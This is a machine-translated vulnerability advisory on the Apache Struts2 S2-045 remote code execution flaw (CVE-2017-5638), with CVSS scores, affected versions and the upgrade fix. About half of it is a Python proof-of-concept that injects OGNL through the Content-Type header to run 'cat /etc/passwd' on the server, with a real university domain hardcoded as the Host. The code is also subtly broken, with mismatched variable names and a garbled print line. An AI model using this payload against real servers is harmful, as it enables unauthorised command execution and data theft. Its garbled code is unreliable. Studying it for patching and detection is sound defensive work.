Lucene search

K
myhack58佚名MYHACK58:62201784026
HistoryMar 07, 2017 - 12:00 a.m.

Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net

2017-03-0700:00:00
佚名
www.myhack58.com
1079

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com)
FreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported.
Apache Struts is a United States Apache(the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework.
Vulnerability number
CVE-2017-5638
Vulnerability description
The Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution.
In fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it.
The scope of the impact
The Struts 2.3.5 – Struts 2.3.31
The Struts 2.5 – Struts 2.5.10
Solution
If you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver.
Vulnerability PoC
#! /usr/bin/env python

encoding:utf-8

import urllib2
import sys
from poster. encode import multipart_encode
from poster. streaminghttp import register_openers
header1 ={
“Host”:“alumnus. shu. edu. cn”,
“Connection”:“keep-alive”,
“Refer”:“alumnus. shu. edu. cn”,
“Accept”:“/”,
“X-Requested-With”:“XMLHttpRequest”,
“Accept-Encoding”:“deflate”,
“Accept-Language”:“zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4”,
}
def poc():
register_openers()
datagen, headers = multipart_encode({“image1”: open(“tmp.txt”, “rb”)})
header[“User-Agent”]=“Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36”
header[“Content-Type”]=“‘%{(#nike,=‘multipart/form-data’).
(#[email protected]@DEFAULT_MEMBER_ACCESS).
(#_memberAccess? (#_memberAccess=#dm):
((#container=#context[‘com. opensymphony. xwork2. ActionContext. container’]).
(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()).
(#context. setMemberAccess(#dm)))). (#cmd=‘cat /etc/passwd’).
(#iswin=(@java.lang.System@getProperty(‘os. name’). toLowerCase(). contains(‘win’))).
(#cmds=(#iswin? {‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).
(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)).
(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().
getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)).
(#ros. flush())}”’
request = urllib2. Request(str(sys. argv[1]),datagen,headers=header)
response = urllib2. urlopen(request)
print the response. read()

poc()

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%